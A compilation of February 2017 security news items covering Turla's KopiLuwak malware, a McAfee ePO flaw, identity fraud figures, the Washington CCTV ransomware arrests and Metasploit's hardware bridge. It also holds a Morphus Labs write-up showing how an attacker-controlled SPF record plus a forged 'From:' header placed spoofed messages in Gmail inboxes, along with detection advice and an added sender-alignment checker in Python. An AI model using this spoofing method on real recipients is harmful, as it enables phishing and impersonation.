“Vulnerabilities like this can allow deep insight into the organisation without an attacker requiring any privileged access to centralised platforms such as Active Directory; with this access an attacker can profile users and the infrastructure passively,” Talos researchers said in a blog post.

The security hole affects McAfee ePO version 5.1.3 and earlier, and 5.3.2 and earlier. Intel Security has released hotfixes to address the vulnerability. While the vendor says there are no mitigations or workarounds, Talos believes attacks can be prevented by limiting access to port 8443.

Cisco has published technical details on the vulnerability and Intel Security has released an advisory with information on affected versions and patches.

It’s not uncommon for researchers to find vulnerabilities in enterprise security products. Serious flaws have also been identified in solutions from Symantec, FireEye, Kaspersky, Sophos and several other vendors.


Russia-Linked "Turla" Group Uses New JavaScript Malware

3.2.2017 securityweek Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.

Turla, an advanced persistent threat (APT) actor that has been active since at least 2007, is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, Venomous Bear and KRYPTON, and some of its primary tools are tracked as Turla (Snake and Uroburos), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

The cyberspies have been mainly interested in organizations located in Europe and the United States. Recent attacks observed by researchers at Kaspersky Lab appear to have targeted organizations in Greece, Qatar and Romania.

In a report sent out to customers in June 2016, Kaspersky revealed that Turla had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents. In late November, the security firm spotted a new JavaScript payload designed mainly to avoid detection. Microsoft researchers have also been monitoring the threat.

The new malware, dubbed KopiLuwak, has been delivered to at least one victim using a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Since the document appears to have been sent by the Qatar ambassador’s secretary, experts believe the attackers may have breached the diplomatic organization’s network.

The final KopiLuwak payload is hidden under several JavaScript layers. Once it becomes persistent by creating a registry key, the malware executes a series of commands in an effort to collect information about the infected system. The harvested data is stored in a temporary file that is deleted after it’s encrypted and stored in memory.

KopiLuwak then attempts to contact its command and control (C&C) servers. These are compromised websites whose addresses are hardcoded into the malware.

The C&C can instruct the malware to sleep, exit and terminate C&C communications until the next reboot, uninstall itself, and run arbitrary commands on the infected system using Wscript.shell.run().

One of the C&C domains had expired, allowing Kaspersky to acquire it and use it as a sinkhole. Several systems connected to this domain, but the most interesting IP was one associated with the Greek Parliament.

For the time being, Kaspersky says KopiLuwak is less popular than Icedcoffee, but the company believes the new malware will be used more in the future as a first-stage delivery mechanism and victim profiler.

“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”


Security Intelligence Automation Startup LogicHub Emerges from Stealth

3.2.2017 securityweek Security
Machine learning and artificial intelligence seem to be the way forward in cyber security; nearly all new companies and products boast that capability. But one new company, emerging from stealth on Wednesday, is a little different. Most current security systems seek to automate knowledge; this one seeks to automate intelligence -- the 'how' over and above the 'what'.

LogicHub announced its arrival with news of an $8.4 million Series A funding round led by Storm Ventures and Nexus Venture Partners. Its purpose is to build a new type of threat detection system based on human security intelligence rather than simply big data analysis. This is based on one primary observation: a top grade human analyst is better at detecting threats than the current generation of threat detection systems.

"We have done what we call cyberhunt challenges with 75 companies," CEO and co-founder Kumar Saurabh told SecurityWeek. "We provided a volume of data containing a threat, and asked each company if its automated system would find it. In only two out of the 75 challenges did the organization say its systems had more than a 50% chance of doing so. But they also said their in-house expert analyst would find it with 90+% confidence."

But when he next asked if they could find the threat in two minutes, the response was resounding: it would take more like two hours. "This is what I hear again and again," he said: "the systems are not clever enough, and the analysts are not fast enough." His solution is to develop a system that can combine the intelligence of analysts with the speed of machines.

"At the end of the day," says Saurabh, "experienced cyber analysts are much better at detecting threats and triaging false alarms than the security tools available, but given the magnitude of the challenge, most teams can only inspect a tiny fraction of all security events collected in-depth. To combat this, LogicHub has found a way to capture and automate the knowledge and expertise of the most skilled cyber analysts, which results in much deeper threat detection."

This is the conundrum that LogicHub has set itself to solve: automating the human expert analyst's threat hunting process rather than just generating and maintaining more and more rules on recognizing known threat indicators. By capturing expertise into a security intelligence 'brain', that expertise can then be used by lower grade analysts in the future. Furthermore, if the expert analyst is tempted away by a higher salary elsewhere, his or her expertise does not entirely leave at the same time.

It requires a different type of architecture, and Saurabh points to Google Search as an example. It is fast, clever, and able to 'predict' user requirements. "One of the key things Google did a couple of years ago," he explained, "was they built a knowledge graph. And that knowledge graph has tens of millions of entities and relationships. They use that knowledge graph to link entities by relationships so that it understands the data it contains."

In fact, in October 2016, City University of New York professor Jeff Jarvis tweeted, "Google knowledge graph has more than 70 billion facts about people, places, things. + language, image, voice translation."

"The difference between Knowledge Graph and the security solutions available today is that they don't understand the data," said Saurabh. "They do nothing to tell the user how to navigate the data." It's like the difference between modern GPS and a road atlas, he continued. "With the atlas, you have the data, but you have to figure out what that data means by yourself."

In threat analysis, there are very few people who really understand what the data means. "Since that understanding is trapped in their heads, it can only be leveraged in a very limited way. With automation, we can take the expertise that is trapped in their heads and turn it into a system so that what one analyst knows and applies can be shared with ten other people on the security team. Over time you can build a system that is more available as a service, and can be used by hundreds of companies -- it becomes a security brain."

Developing that security brain is what LogicHub is doing. It has an augmentation tool that automates the capture of analyst methods, so that different analytical methods from different analysts can be combined into the intelligence automation tool. "A security analyst with our security intelligence automation platform can become equal to ten analysts. You have to use the augmentation tool to get there; but it has that potential."

This system will be offered as an on-premise solution for those companies not yet comfortable with the cloud and sharing data, and as a cloud service that combines and shares analytical expertise with all cloud customers.


Identity Fraud Hit 15.4 Million U.S. Victims in 2016: Report

3.2.2017 securityweek Crime
In 2016, 15.4 million U.S. consumers became identity fraud victims, a 16% increase over the previous year, according to a recent Javelin Strategy & Research study.

Despite increased efforts from the industry to tackle identity fraud, cybercriminals netted two million more victims last year, with damages rising by $1 billion to reach $16 billion, Javelin Strategy & Research’s 2017 Identity Fraud Study shows. These losses are in line with those reported two years ago.

Payment card fraud experienced a resurgence in 2016, with card-not-present (CNP) fraud rising 40%. As the report explains, “the increase in EMV cards and terminals was a catalyst for driving fraudsters to shift to fraudulently opening new accounts.” The research also claims that, although crooks are getting better at evading detection, consumers with an online presence are detecting fraud more quickly.

Fraud trends, however, are worrying, especially with 6.15% of consumers becoming victims of identity fraud in 2016. Compared to the previous year, almost 2 million more people fell victim, mainly fueled by a spike in existing card fraud, the report shows.

While the level of point-of-sale (POS) fraud remained almost unchanged compared to 2014 and 2015, account takeover (ATO) incidence and losses rose notably in 2016. ATO losses increased 61% over the previous year to reach $2.3 billion, while incidence went up 31%.

According to the research and consulting firm, account takeover remains one of the most challenging fraud types for consumers. Victims, the company says, pay an average of $263 in out-of-pocket costs to resolve an incident. The total time spent resolving this type of fraud was 20.7 million hours in 2016, 6 million hours more than in 2015.

The study also says that fraudsters have become much better at avoiding detection, with new-account fraud (NAF) victims being notably more likely to discover fraud through review of their credit report (15%) or when they were contacted by a debt collector (13%).

The annual Identity Fraud Study has surveyed 69,000 respondents since 2003, and identified and analyzed four consumer personas for this year: Offline Consumers, Social Networkers, e-Commerce Shoppers and Digitally Connected.

Because they have little online presence, Offline Consumers are exposed to fewer fraud risks, but they incur higher fraud amounts than other victims and need more than 40 days to detect fraud. Because they share their social life on digital platforms but have little presence on e-commerce or m-commerce sites, Social Networkers face a 46% higher risk of account takeover fraud.

E-commerce buyers (including mobile shoppers) expose their financial information and are at risk of existing card fraud. However, 78% of them detect fraud within one week of it beginning, thus minimizing losses. As for the Digitally Connected Consumer category, it includes people who have extensive social network activity, shop online frequently, and adopt new digital technologies fast. They face a 30% higher risk of becoming a fraud victim.

“After five years of relatively small growth or even decreases in fraud, this year’s findings drive home that fraudsters never rest and when one area is closed, they adapt and find new approaches. The rise of information available via data breaches is particularly troublesome for the industry and a boon for fraudsters. To successfully fight fraudsters, the industry needs to close security gaps and continue to improve and consumers must be proactive too,” Al Pascual, senior vice president, research director and head of fraud & security, Javelin Strategy & Research, said.

The 2017 ID Fraud survey was conducted among 5,028 U.S. adults over age 18 on KnowledgePanel, the company said. The sample is believed to be representative of the U.S. census demographics distribution, recruited from the Knowledge Networks panel. The data was collected between Nov 5 and Nov 21, 2016.


Czech Users Increasingly Threatened by Malicious Downloaders

3.2.2017 SecurityWorld Viruses
Although the dominance of the Danger malware has ended, other dangerous downloaders of malicious code have taken its place.

The overwhelming predominance of the Danger malicious code over all other internet threats in the Czech Republic has, for now, passed.

In January this malware still represented the most frequently detected threat, but its share fell by more than 30 percentage points to 11.05 percent. Other types of malicious code gained ground instead, according to statistics from Eset.

“The decline in the share of the Danger downloader is really significant. In December it represented almost every second recorded threat, in January only every tenth. However, we found a significant increase in the occurrence of various types of malware from the TrojanDownloader family,” says Miroslav Dvořák, technical director of Eset.

According to him, like Danger, this is code that tries to load additional malicious code onto the infected device.

The second most frequent January threat in the Czech Republic was a member of the above-mentioned family, specifically VBA/TrojanDownloader.Agent.CHO, which accounted for 5.03 percent of detected cases.

Third place went to the Changer malware, which Eset detects as JS/ProxyChanger. This malicious code makes it possible to redirect a legitimate request to a page planted by the attacker and thus obtain, for example, the victim's credit card number. Changer was behind 4.36 percent of the internet attacks detected in the Czech Republic.

Top 10 threats in the Czech Republic for January 2017:

1. JS/Danger.ScriptAttachment (11,05 %)

2. VBA/TrojanDownloader.Agent.CHO (5,03 %)

3. JS/ProxyChanger (4,36 %)

4. JS/TrojanDownloader.Nemucod (4,12 %)

5. JS/Kryptik.RE (3,38 %)

6. VBA/TrojanDownloader.Agent.CIY (2,55 %)

7. VBA/TrojanDownloader.Agent.CIQ (2,04 %)

8. Java/Adwind (2,01 %)

9. JS/TrojanDownloader.Iframe (1,73 %)

10. PowerShell/TrojanDownloader.Agent.DV (1,58 %)

Source: Eset, February 2017

New centers in the Czech Republic and Slovakia

Eset has also launched new research and development centers -- these branches are being established in Brno and in Žilina, Slovakia.

“We chose the Brno center because of its geographic proximity to the Bratislava headquarters, the local base of technical universities and, of course, the IT talent available in this region,” says Juraj Malcho, Eset's chief technology officer.

In the case of Žilina in western Slovakia, it will be the company's third site in Slovakia. Besides the headquarters in Bratislava, Eset already has a development center in Košice, which focuses mainly on anti-spam technologies. In contrast, the specialists at the Žilina branch will collaborate on the development of Eset's business products.


Two Arrested for Hacking Washington CCTV Cameras Before Trump Inauguration
3.2.2017 thehackernews Hacking
Two Arrested in London for Hacking Washington CCTV Cameras Before Trump Inauguration
Two suspected hackers have reportedly been arrested in London on suspicion of hacking 70 percent of the CCTV cameras in Washington with ransomware ahead of President Donald Trump's inauguration last month.
The arrests were made on 20th January by officers from the UK's National Crime Agency (NCA), acting on a request from United States authorities, but were not disclosed until now.
The NCA raided a house in the south of London last month and detained a British man and a Swedish woman, both 50 years old, The Sun reported.
Some 123 of the 187 police CCTV cameras used to monitor public areas in Washington DC stopped working on 12 January, just 8 days before the inauguration of Donald Trump, after a cyber attack hit the storage devices.
The cyber attack lasted for about three days, leaving the CCTV cameras unable to record anything between 12 and 15 January.
It was reported that the surveillance cameras were left useless after ransomware made its way onto the storage devices that record feeds from CCTV cameras across the city. The hackers demanded ransom money, but the Washington DC Police rejected their demand.
Ransomware is an infamous piece of malware that has been known for locking up computer files and then demanding a ransom in Bitcoins in order to help victims unlock their files.
However, instead of fulfilling ransom demands of hackers, the DC police took the storage devices offline, removed the infection and rebooted the systems across the city.
The storage devices were successfully put back to rights, and the surveillance cameras were back to work. According to authorities, no valuable data was lost, and the ransomware infection merely crippled the affected computer network devices.
According to the NCA, "officers executed a search warrant at an address in Natal Road, SW16, on the evening of Thursday 19 January. A man and a woman were arrested and later bailed until April 2017."
The intention of these two 50-year-old suspects is still unclear.


Popular hacking toolkit Metasploit adds hardware testing capabilities
3.2.2017 securityaffairs Hacking

The Metasploit hacking toolkit now includes a new hardware bridge that makes it easier for users to analyze hardware devices.
The popular Metasploit offensive toolkit has become more powerful: it now includes a hardware bridge for conducting security tests on hardware, which is a great help to users who have to test hardware, including IoT devices.

Metasploit already includes more than 1,600 exploits and 3,300 modules, with a huge hacking community that works on new modules and scripts.


Until now, Metasploit only allowed the creation of custom scripts for hardware testing; the new Hardware Bridge API will let users test a variety of hardware, including vehicles’ CAN buses.

The new Hardware Bridge API gives a precious instrument to customers focused on the development of hardware exploits.

The first release of the Hardware Bridge API is specifically designed for testing automotive systems; Rapid7, which maintains the tool, will soon add other modules to extend the capabilities of its product.

Metasploit aims to be a standard tool for a wide range of hardware platforms, including SCADA and industrial control systems (ICS), IoT systems, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.

“Metasploit condensed a slew of independent software exploits and tools into one framework and now we want to do the same for hardware,”

“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” explained Craig Smith, director of transportation research at Rapid7. “We’re working to give security professionals the resources they need to test and ensure the safety of their products — no matter what side of the virtual divide they’re on.”

“Much in the same way that the Metasploit framework helped unify tools and exploits for networks and software, the Hardware Bridge looks to do the same for all types of hardware.”


Russian cyber espionage group Turla leverages on a new JavaScript Malware
3.2.2017 securityaffairs Virus

The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007, targeting government organizations and private businesses.

The list of victims is long and includes also the Swiss defense firm RUAG and the US Central Command.

The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.

Now experts at Kaspersky Lab have discovered a new piece of JavaScript malware linked to the dreaded group; the latest string of attacks targeted organizations in Greece, Qatar, and Romania.

In November both Kaspersky Lab and Microsoft discovered a new JavaScript payload designed mainly to avoid detection.

John Lambert (@JohnLaTwC) tweeted on 28 January 2017: “Qatar #malware DOC extracts payload by regex and drops a very interesting .JS backdoor #DFIR https://pastebin.com/2Wb3hH2S”
The new JavaScript malware dubbed KopiLuwak has been delivered to at least one victim leveraging a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus.


Since the malicious document appears to have been sent by the Qatar ambassador’s secretary, researchers from Kaspersky speculate the cyber spies may have breached the diplomatic organization’s network.

“Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.” states the report published by Kaspersky.

Malware researchers found that the author of KopiLuwak used multiple JavaScript layers to avoid detection. The malicious code gains persistence on the targeted machine by creating a registry key. Once it has infected a system, it executes a series of commands to collect information and exfiltrate data. Stolen data is temporarily stored in a file that is deleted after it’s encrypted and stored in memory.

The KopiLuwak JavaScript malware is controlled through a collection of compromised websites whose addresses are hardcoded into the malicious code.

“The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.” continues the analysis.

The C&C can send arbitrary commands to the infected system using Wscript.shell.run().

Kaspersky analyzed the malware using the “sinkholing” technique: the researchers registered one of the C&C domains, which had expired, and used it as a sinkhole. In this way, they were able to analyze the traffic from infected systems contacting the C&C infrastructure, and discovered that one of the victims used an IP address associated with the Greek Parliament.

Researchers from Kaspersky believe that KopiLuwak malware will be used more in the future.

“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”

The Turla APT group continues to rely on embedded macros in Office documents, an elementary technique that has nonetheless allowed it to compromise high-value targets.


How much trust do you put into your Gmail inbox messages?
3.2.2017 securityaffairs Security

Given the high trust we have in Gmail, we tend to believe that all messages that fall into our inbox are legitimate and safe, but there is something to know …
1. Introduction

Handling e-mail messages carefully is certainly among the first recommendations of any information security policy and user awareness program. The risks involved range from spam to spear phishing attacks, generally aimed at stealing information or infecting the victim’s computer. Most malicious messages are filtered by anti-“everything” engines before ever being delivered to the user’s mailbox, although some bypass those filters and require the user’s perspicacity to be detected.

Generally, our trust in a provider's security filters is proportional to the reputation of the service provider. The higher our belief in the provider, the lower our attention to the risks tends to be. Given the high trust we have in Gmail, we tend to believe that all messages that fall into our inbox are legitimate and safe.

It turns out that, based on our findings this week at Morphus Labs, this “trust” logic should be revisited. We realized that a message that lands in your Gmail inbox, even marked as important and apparently coming from one of your Gmail contacts with no spoofing or security alert, may have been forged by a fraudster or a cybercriminal. As few people may be aware of this possibility, we decided to shed light on the problem with this article.

This document is divided into four parts. First, it gives some context on e-mail spoofing. Then, it walks through our e-mail spoofing experiment scenarios involving Gmail and Yahoo. Next, it presents an additional Gmail behavior, and finally it offers advice on how users can identify spoofed Gmail messages, followed by some closing words.

2. E-mail Spoofing

In this section, we will go through some SMTP concepts and how e-mail sender spoofing occurs. If you are familiar with those concepts, you can skip to the next section.

The Simple Mail Transfer Protocol (SMTP) is the standard protocol used for email transmission over the Internet. Considering the technology evolution rate and today’s security requirements, we may say that this protocol is, at least, anachronistic. Its first version was defined in 1982 by the RFC 821 [1] and has not evolved much since – mainly in security aspects.

As noted above, the SMTP protocol defines the message transport, not the message content. It therefore defines the mail envelope and its parameters, such as the message sender and recipient. The message content (body) and headers are defined by the standard STD 11 (RFC 5322) [2].

Basically, a SMTP transaction consists of three commands:

Mail From: establishes the message return address in case of delivery failure;

Rcpt To: establishes the message recipient. In case of multiple recipients, this command may be repeated for each one;

Data: this command signals the SMTP server to receive the content of the message, which consists of the message headers and body.

To make it clear, let’s look at a very basic sample of an SMTP transaction in Figure 1.

Figure 1: Simple SMTP transaction sample

Note that the directive “From:” is part of the message content and is normally equivalent to the value used in the SMTP command “mail from:”, but not necessarily. Its value can be freely specified by the system or person issuing commands to the SMTP server. Using the same sample, but now spoofing the message sender, it would be enough to change the “From: “ to the desired value, as seen in Figure 2.

Figure 2: A sample SMTP transaction with a spoofed sender

In this case, the message delivered to recipient@domain.com will look as if it had been sent by SpoofedSender@anydomain.com rather than sender@domain.com. This opens the way for message impersonation or sender spoofing, and it is exactly how cybercriminals or fraudsters trick their victims into clicking on malicious links, for example.

Note that with this kind of impersonation, if the recipient replies to the message, the reply will be delivered to the spoofed address. For the example above, it would be delivered to SpoofedSender@anydomain.com.

It turns out that changing the “From:” to the desired value will almost certainly trigger the recipient’s mail server anti-spam or anti-phishing filters, which will reject or quarantine the message. If the message bypasses those filters, it will be up to the recipient to detect that the message was forged by analyzing the message headers.

To evade those filters, some spammers configure ad-hoc mail servers to send spoofed messages on behalf of a certain domain by setting both the “Mail From:” SMTP command and the “From:” header to the desired value. This spoofing strategy can be combated by the owners of the Internet domain by applying spoofing protection mechanisms such as SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (Domain-based Message Authentication, Reporting & Conformance). With SPF, for example, you can specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of your domain. Once this policy is established, it is up to the recipient’s mail server to check the policy and reject messages coming from non-authorized servers.
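To make the envelope/content distinction concrete, here is an added example in Python that is not part of the original article: a minimal parser for the client side of an SMTP transaction like the one in Figure 2, which separates the envelope (MAIL FROM / RCPT TO) from the RFC 5322 header block and reports whether the “From:” header domain matches the envelope sender domain (the alignment DMARC later checks). The transcript is constructed; the addresses and the domain name our-generic-domain.com are the placeholders used in this article.

```python
import re
from dataclasses import dataclass, field

# "<addr>" -> addr; a bare address without brackets is also accepted.
_ANGLE = re.compile(r"<([^>]*)>")


def extract_address(text: str) -> str:
    """Return the bare, lower-cased address from 'Name <addr>', '<addr>' or 'addr'."""
    m = _ANGLE.search(text)
    return (m.group(1) if m else text).strip().lower()


def domain_of(address: str) -> str:
    """Domain part of an address ('' when there is no '@')."""
    return address.rpartition("@")[2].lower()


@dataclass
class Transaction:
    mail_from: str = ""                              # envelope sender (MAIL FROM)
    rcpt_to: list = field(default_factory=list)      # envelope recipients (one RCPT TO each)
    headers: dict = field(default_factory=dict)      # RFC 5322 header block, names lower-cased
    body: str = ""


def parse_client_transcript(lines) -> Transaction:
    """Walk the commands a client sends in one SMTP transaction.

    Only the client side is present (server replies are omitted); command
    verbs are matched case-insensitively, as an SMTP server does.
    """
    tx = Transaction()
    in_data = False
    content = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if in_data:
            if line == ".":                           # a lone dot ends DATA
                in_data = False
            else:                                     # undo RFC 5321 dot-stuffing
                content.append(line[1:] if line.startswith("..") else line)
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "MAIL":                            # MAIL FROM:<addr>
            tx.mail_from = extract_address(arg.partition(":")[2])
        elif verb == "RCPT":                          # RCPT TO:<addr>
            tx.rcpt_to.append(extract_address(arg.partition(":")[2]))
        elif verb == "DATA":
            in_data = True
    # The content is a header block, an empty line, then the body.
    split = content.index("") if "" in content else len(content)
    for header in content[:split]:
        name, _, value = header.partition(":")
        tx.headers[name.strip().lower()] = value.strip()
    tx.body = "\n".join(content[split + 1:])
    return tx


def header_from_aligned(tx: Transaction) -> bool:
    """True when the content 'From:' domain equals the envelope sender domain.

    This is the strict identifier alignment DMARC checks (relaxed mode also
    accepts subdomains of the same organisation). The spoofed transaction of
    Figure 2 fails it: the envelope sender stays on the real sending domain
    while 'From:' claims another one.
    """
    return domain_of(extract_address(tx.headers.get("from", ""))) == domain_of(tx.mail_from)


# Constructed transcript modelled on Figures 2 and 4 of the article: the
# envelope sender is the experiment domain, the content "From:" claims Gmail.
SPOOFED_TRANSCRIPT = [
    "HELO mail.our-generic-domain.com",
    "MAIL FROM:<email@our-generic-domain.com>",
    "RCPT TO:<temporaryrecipient@gmail.com>",
    "DATA",
    "From: Temporary Sender <temporarysender@gmail.com>",
    "To: temporaryrecipient@gmail.com",
    "Subject: Spoofed sender test",
    "",
    "Hello from the experiment.",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    tx = parse_client_transcript(SPOOFED_TRANSCRIPT)
    print("envelope sender:", tx.mail_from)
    print("header From    :", tx.headers["from"])
    print("recipients     :", tx.rcpt_to)
    print("aligned        :", header_from_aligned(tx))
```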

3. Experiments

After covering some basic concepts of the SMTP protocol and how e-mail spoofing occurs, it’s time to check the resilience of Gmail and Yahoo against mail spoofing. We are going to impersonate the “From:” message header value. The “Mail From:” SMTP command will be issued using an address of a generic domain owned by us.

For the experiments, we created a very simple scenario:

For the source of the spoofed messages, we used a generic “.com” domain owned by us, registered roughly a year ago, that had not been used to host content or to send e-mail;
For the mail server, we hired and configured a Linux server at Amazon EC2 with minimal resources, running a default Postfix installation, with the address *.*.123.26;
The Gmail and Yahoo accounts we use as recipients and senders of the spoofed messages were created for the experiments. They are: temporaryrecipient@gmail.com, temporaryrecipient@yahoo.com, temporarysender@gmail.com and temporarysender@yahoo.com;
All the tests were done by connecting directly to our SMTP server (port 25) and issuing SMTP commands manually, to make it easy to collect the evidence for this report.

Let’s get started.

3.1. Trying to spoof without SPF

In this experiment, we are going to try the following scenario:

Try to impersonate Gmail and Yahoo accounts by sending spoofed messages to the respective provider’s recipients, i.e. temporarysender@gmail.com to temporaryrecipient@gmail.com and temporarysender@yahoo.com to temporaryrecipient@yahoo.com.
The SMTP server’s IP address is not allowed by the SPF policy of our generic “.com” domain to send e-mails on its behalf, as seen in Figure 3.

Figure 3: No SPF policy associated with the experiment domain

3.1.1. Trying to spoof a Gmail to Gmail message

This experiment consisted in sending an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. Note that email@our-generic-domain.com was set as the “Mail From:” SMTP parameter, while the “From:” header was set to the forged value temporarysender@gmail.com, as seen in Figure 4.

Figure 4 – Trying to spoof Gmail to Gmail message with no SPF policy

As a result of this experiment (Figure 5), the Gmail servers rejected our spoofed message (ID: 7A14D2452C) with the error code 421-4.7.0 followed by the message “To protect our users from spam, mail sent from your IP address has been temporarily rate limited.” We can also see the error 421-4.7.0 with the message “Our system has detected that this message is suspicious due to the very low reputation of the sending IP address.”

Figure 5 – Gmail servers rejecting the spoofed message

3.1.2. Trying to spoof a Yahoo to Yahoo message

Now, let’s see what happened in the Yahoo spoofing scenario. Similarly to the Gmail scenario, we tried to send a message to temporaryrecipient@yahoo.com pretending it to be from temporarysender@yahoo.com, as seen in Figure 6.

Figure 6 – Trying to spoof Gmail to Gmail message with no SPF policy

As a result of this experiment, we verified that our Postfix mail server couldn’t deliver the message (ID 4259245CE). The error 421-4.7.0, followed by the message “suspicious due to the very low reputation of the sending IP address”, was triggered, as seen in Figure 7.

Figure 7: Mail rejected by Yahoo servers during the spoofed message delivery

3.2. Trying to spoof with SPF

In this experiment, we are going to try the following scenario:

Try to impersonate Gmail and Yahoo accounts by sending spoofed messages to the respective provider’s recipients, the same as in the previous experiment.
Configure our domain’s SPF policy to allow our SMTP server to send e-mail on its behalf, as seen in Figure 8. Our intention is to verify whether this configuration, besides being a kind of self-authorization, could interfere with the Gmail and Yahoo anti-spoofing filters.

Figure 8: SPF policy allowing our SMTP Server

3.2.1. Trying to spoof a Gmail to Gmail message

As in the previous experiment, we try to send an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. In Figure 9, you can see the commands issued to our SMTP server in order to send the spoofed message.

Figure 9: Spoofing Gmail to Gmail with SPF policy allowing our SMTP server

In Figure 10, you can see the logs from our SMTP server while delivering the message (ID EBE852452C) to the Gmail servers.

Figure 10 – SMTP logs

Unlike what happened when the SPF policy was not authorizing our SMTP server, this time the Gmail servers accepted our message for delivery. It remained to be seen whether the message would be tagged as SPAM or something similar. To our surprise, the message was delivered to the recipient’s inbox folder, as seen in Figure 11.

Figure 11 – Spoofed message in the recipient’s inbox folder

As you can see in Figure 12, when opening the message, the only detail that may draw the user’s attention to a suspicious “non-Gmail” message is the “via our-generic-domain.com” tag near the sender’s address. As it is not an alert and carries no warning sign, users may not pay enough attention to this detail and believe the message is legitimate. It is important to note that if the user receives this message in the iOS mobile app, this detail does not even appear, as shown in Figure 13. The Gmail app for Android offers the user the option to see the security details of the message.

Figure 12 – Spoofed message in the Gmail Web app

Figure 13 – The spoofed message seen from the Gmail iPhone mobile app

By observing the message headers in Figure 14, we can see that the SPF check PASSED and, despite the unsuccessful DMARC check, the e-mail was delivered to the recipient’s inbox folder. Technically speaking, the DMARC test depends on the SPF and DKIM tests. If both tests return OK, DMARC will PASS. [3]

Similarly to SPF, DMARC is a configuration done at the DNS zone level that tells the recipient’s e-mail server what to do with a message that does not comply with the policy: “reject” to drop the message, “quarantine” to isolate the message, or “none” to indicate that the message should be delivered anyway.

Figure 15: Spoofing Yahoo to Yahoo with SPF policy, SMTP transaction

Unlike Gmail, Yahoo rejected our spoofed message during the SMTP transaction with the error 554 5.7.9 followed by the message “Message not accepted for policy reasons.” It is not clear, but the message was probably blocked because of the @yahoo.com e-mail address in the “From:” message header being sent from a non-Yahoo server.

Figure 16 – Spoofed message rejected by Yahoo servers

3.3. Trying to spoof messages between corporate domains hosted by Google Apps

Given our success spoofing messages between @gmail.com accounts, we became curious whether the same strategy would work for corporate domains hosted by Google. For this scenario we had help from two companies that host their e-mail with Google, and tried to send a spoofed message between user accounts.

The same steps from section 3.2.1 (spoofing Gmail to Gmail with SPF) were used. This more sensitive scenario showed us concerning results: not only was the message delivered to the recipient’s inbox folder without security warnings, but it also displayed the spoofed account’s profile picture.

3.4. Extra findings

During our experiments, we found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exist in the Gmail user base.

In this situation, unlike the successful scenarios, Gmail forwarded the message to the Spam folder and added a special security alert informing that it could not verify whether the message was really sent by gmail.com, as seen in Figure 17.

Figure 17 – Behavior when the spoofed sender is a non-existing Gmail account

Take a look at the same message in the Gmail app for iOS in Figure 18. Beyond the alert, it shows a fish hook icon as an allusion to a phishing attack.

Figure 18 – Spoofed message on Google mobile app for iOS

Another interesting finding is related to the spoofed e-mail’s avatar. Google loads the real profile image associated with the spoofed e-mail address, which increases the perception of legitimacy by the message recipient, as seen in the figure below.

Figure 19 – Spoofed sender profile picture

4. How to identify Gmail spoofed messages

Given that the spoofed message is delivered to your inbox without a security warning, may have been flagged as important, shows the picture associated with the spoofed e-mail address and may not show that the message was sent through a non-Google server, what can a user do to protect themselves?

In this section, we give advice on how users may identify spoofed Gmail messages and avoid risks.

4.1. Examine message details on Gmail

Be aware of messages in your inbox coming from “@gmail.com” addresses via other servers or domains. Normally, @gmail.com messages are delivered directly from the Gmail servers. Unfortunately, the “via” tag is available only in the Gmail Web application. In the mobile (Android and iOS) apps this information is not present, making it harder to identify fake messages.

Additionally, you may take a look at the message details. This feature is available in the Gmail Web application by clicking on the “down-arrow” near “to me”, as in Figure 20.

Figure 20 – Examining message details

4.2. Examine message source

By examining the message details you may notice the first signs of a spoofed message, but only by examining the full message headers can you be sure.

You can access the message source by clicking on the drop-down button near the “reply” button in the Gmail Web application and choosing the “Show original” option, as seen in Figure 21.

Figure 21 – Opening message source/original

Note that the value of the “Return-Path” field in the message headers is an address of a non-Gmail domain. The value in this field is exactly the one used in the “Mail From:” SMTP command when we forged this message.

So, be suspicious of Gmail messages you receive with an improper address in this field, as seen in Figure 22.

Figure 22 – Observing the message source

It is worth noting that, since Gmail marks messages with the “via” tag, there are obviously situations in which the message was sent by another mail server and yet is legitimate. Thus, not all messages marked with the “via” tag are malicious.
